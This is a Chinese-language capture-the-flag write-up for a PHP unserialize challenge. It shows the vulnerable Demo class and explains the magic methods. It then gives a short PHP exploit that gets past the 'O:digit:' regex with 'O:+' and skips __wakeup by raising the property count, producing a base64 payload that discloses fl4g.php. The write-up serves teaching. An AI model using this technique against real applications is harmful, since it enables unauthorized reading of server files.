源码解析

依旧是反序化漏洞，本源码定义了一个Demo的类，里包含了__construct、__destruct()、__wakeup三个方法

简介：
__construct()方法是在创建对象时，调用赋初值

__destruct()方法是在对象不再使用时自动调用，这里的主要目的是高亮显示file属性里的数据，并以字符串的形式回显出来

__wakeup()方法是在进行反序列化之前进行调用，主要目的是为了检测file属性里是不是index.php，如果不是就重新赋值为index.php

<?php 
class Demo { private $file = 'index.php';public function __construct($file) { $this->file = $file; }function __destruct() { echo @highlight_file($this->file, true); }function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php$this->file = 'index.php'; } } 
}
if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else {@unserialize($var); } 
} else { highlight_file("index.php"); 
} 
?>

最后传参部分接受GET方法传参，并且会将传入的参数进行base64解密

接着利用正则表达式判断参数中是否含有O:数字：或者C:数字:(不区分大小写)

如果有就直接结束程序，如果不是就对参数进行反序列化还原

解题步骤

首先我们得知需要绕过的地方有两处

第一是传参的正则表达式

绕过方法为：利用str_replace函数对参数中的O:替换为O:+

第二是__wakeup方法

绕过方式：当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

为了绕过__wakeup()，我们将1改为任意大于1的都行

既然绕过了__wakeup方法，说明file属性不会被强制赋值和检测，所以我们可以直接将file属性的值改为flag.php

最终代码

class Demo 
{ private $file = 'fl4g.php';
}
$a= serialize(new Demo);
$a = str_replace('O:',"O:+",$a);
$a = str_replace("1:","6:",$a);
echo base64_encode($a);
?>

获得flag